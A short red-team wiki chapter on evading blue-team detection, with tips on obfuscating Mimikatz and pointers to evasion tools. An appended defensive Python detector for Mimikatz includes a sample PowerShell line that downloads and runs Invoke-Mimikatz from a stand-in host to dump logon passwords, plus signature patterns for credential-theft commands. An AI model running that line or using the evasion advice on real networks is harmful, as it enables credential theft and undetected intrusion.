DarthSidious
Stealth

This chapter is about staying stealthy and opsec safe. That means not getting caught by the blue team on engagements.

General

These are some key things we must avoid:

  • Putting files on disk

  • RDPing into boxes

  • Triggering pop-ups on desktops

  • Changing account passwords

  • Locking out users

  • Changing group membership of accounts

  • Changing existing settings and files

  • Changing GPOs permanently

  • Messing up Kerberos tickets

  • Triggering alerts from security products like AV

  • Killing processes you don't own

  • Any sort of DoS

  • Leaving files and tools behind

  • Not cleaning up

Using DLLs

Obfuscating mimikatz

Any sysadmin with half a brain can now write something to stop the most common ways of executing Mimikatz. Since we don't want to get caught, we can obfuscate Mimikatz in numerous ways:

  • Running it in memory, either through PowerShell or through Meterpreter (will probably get you caught)

  • Changing some basic things that will be triggered by signature, see:

https://pentestlab.blog/tag/rundll32/
https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781

Veil Pillage

Veil Pillage is a post-exploitation tool and part of the Veil framework, intended for staying undetected through obfuscation.

https://github.com/Veil-Framework/Veil-Pillage

Last updated 7 years ago
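The "Obfuscating mimikatz" section above rests on two claims: that any sysadmin can write a signature for the common ways Mimikatz gets run, and that loading it in memory through PowerShell will probably get you caught. The following added example (not code from the DarthSidious project) shows, from the blue-team side, the two detection layers those claims refer to: a naive string signature over PowerShell script-block log text (Event ID 4104), and a behavioural check over Sysmon-style ProcessAccess events (Event ID 10) that flags non-system processes opening lsass.exe. The log records are constructed for this example; the access masks and allowlist are assumptions taken from common detection write-ups, not from the page.

```python
import re

# Constructed body of a PowerShell script-block log (Event ID 4104).
# Not a real capture; built for this example only.
SCRIPT_BLOCK_SAMPLE = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Invoke-Mimikatz.ps1');"
    " Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"
)

# Constructed Sysmon-style Event ID 10 (ProcessAccess) records.
PROCESS_ACCESS_SAMPLE = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\bob\Downloads\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Program Files\App\app.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410"},
]

# Layer 1: the string signature. Cheap to write, and exactly what the page
# says gets evaded by changing "some basic things" in the tool.
SIGNATURE_PATTERNS = [
    re.compile(r"invoke-mimikatz", re.I),
    re.compile(r"sekurlsa::", re.I),
    re.compile(r"privilege::debug", re.I),
    re.compile(r"\bmimikatz\b", re.I),
]


def signature_hits(text):
    """Return the signature patterns that match a script-block text."""
    return [p.pattern for p in SIGNATURE_PATTERNS if p.search(text)]


# Layer 2: behaviour. Whatever the binary is called, dumping credentials
# means reading LSASS memory, so watch who opens lsass.exe and how.
# These GrantedAccess masks are commonly cited in detection write-ups as
# typical of credential dumpers; the set is an assumption for this example.
SUSPICIOUS_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}
# Example allowlist of system processes that legitimately touch LSASS
# (assumption; a real deployment tunes this against its own baseline).
TRUSTED_SOURCES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
}


def lsass_access_alert(event):
    """True if a ProcessAccess event looks like credential dumping."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return False
    if event["SourceImage"] in TRUSTED_SOURCES:
        return False
    return int(event["GrantedAccess"], 16) in SUSPICIOUS_MASKS


def triage(script_blocks, process_access_events):
    """Run both layers and return a list of (alert_type, detail) tuples."""
    alerts = []
    for block in script_blocks:
        hits = signature_hits(block)
        if hits:
            alerts.append(("signature", hits))
    for event in process_access_events:
        if lsass_access_alert(event):
            alerts.append(("lsass_access", event["SourceImage"]))
    return alerts


if __name__ == "__main__":
    for alert in triage([SCRIPT_BLOCK_SAMPLE], PROCESS_ACCESS_SAMPLE):
        print(alert)
```

The point of pairing the two layers is the one the section makes implicitly: the string signature fires on the unmodified Invoke-Mimikatz one-liner, but it is tied to names that a renamed build no longer carries, whereas the LSASS-access check keys on what the tool must do rather than what it is called, which is why the in-memory PowerShell route still tends to get noticed.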